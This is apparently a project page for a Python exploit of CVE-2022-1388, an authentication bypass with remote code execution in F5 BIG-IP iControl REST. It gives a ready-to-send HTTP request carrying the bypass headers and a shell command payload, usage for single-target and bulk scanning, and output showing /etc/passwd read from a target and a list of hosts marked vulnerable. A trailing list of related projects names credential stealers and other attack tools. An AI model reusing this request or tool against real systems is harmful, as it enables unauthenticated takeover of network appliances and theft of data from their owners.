CVE-2022-1388

CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE.

POST /mgmt/tm/util/bash HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host
Content-type: application/json
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Content-Length: 42

{"command": "run", "utilCmdArgs": "-c id"}

Usage

Vulnerability detection against a URL.

$ python CVE-2022-1388.py -u https://192.168.2.110
[+] https://192.168.2.110 is vulnerable!!!

Execute arbitrary commands.

$ python CVE-2022-1388.py -u https://192.168.2.110 -c 'cat /etc/passwd'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
tmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin
admin:x:0:500:Admin User:/home/admin:/usr/bin/tmsh
qemu:x:107:107:qemu user:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/:/sbin/nologin
syscheck:x:199:10::/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
f5_remoteuser:x:499:499:f5 remote user account:/home/f5_remoteuser:/sbin/nologin
......

Read all URLs in the file and perform vulnerability detection.

$ python CVE-2022-1388.py -f urls.txt
[-] https://10.1.6.5 is not vulnerable.
[+] https://10.1.92.34 is vulnerable!!!
[+] https://10.2.124.144 is vulnerable!!!
[+] https://10.1.194.22 is vulnerable!!!
[+] https://10.2.21.132 is vulnerable!!!
[+] https://10.1.236.2 is vulnerable!!!
[+] https://10.3.155.2 is vulnerable!!!
[+] https://10.2.155.4 is vulnerable!!!
[+] https://10.3.151.92 is vulnerable!!!
[+] https://10.4.139.131 is vulnerable!!!
[+] https://10.7.226.141 is vulnerable!!!
[+] https://10.1.129.53 is vulnerable!!!
[+] https://10.9.45.2 is vulnerable!!!
[+] https://10.5.96.105 is vulnerable!!!
[+] https://10.3.156.6 is vulnerable!!!
$ cat success.txt
https://10.1.92.34
https://10.2.124.144
https://10.1.194.22
https://10.2.21.132
https://10.1.236.2
https://10.3.155.2
https://10.2.155.4
https://10.3.151.92
https://10.4.139.131
https://10.7.226.141
https://10.1.129.53
https://10.9.45.2
https://10.5.96.105
https://10.3.156.6

CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE

Related tags

Overview

CVE-2022-1388

Usage

Owner

M4rtin Hsu

Coerce authentication from Windows hosts via MS-FSRVP (Requires FS-VSS-AGENT service running on host)

List of S3 Hacks

log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

Receive notifications/alerts on the most recent disclosed CVE's.

POC using subprocess lib in Python 🐍

Writing and posting code throughout my new journey into python!

Log4j command generator: Generate commands for CVE-2021-44228

Fetch Chrome, Firefox, WiFi password and system info

Argument Injection in Dragonfly Ruby Gem

Ensure secure infrastructure and consistency with the firewall rules

LaxrFar Python Obfuscator

Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)

Discord exploit allowing you to be unbannable.

Trustme: #1 quality TLS certs while you wait

LdapRelayScan - Check for LDAP protections regarding the relay of NTLM authentication

Unauthenticated Sqlinjection that leads to dump data base but this one impersonated Admin and drops a interactive shell

PortSwigger Burp Plugin for the Log4j (CVE-2021-44228)

This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).

Proof on Concept Exploit for CVE-2021-38647 (OMIGOD)

A repository to detect the ARP spoofing in any devices and prevent Man in the Middle(MITM) attack using Python3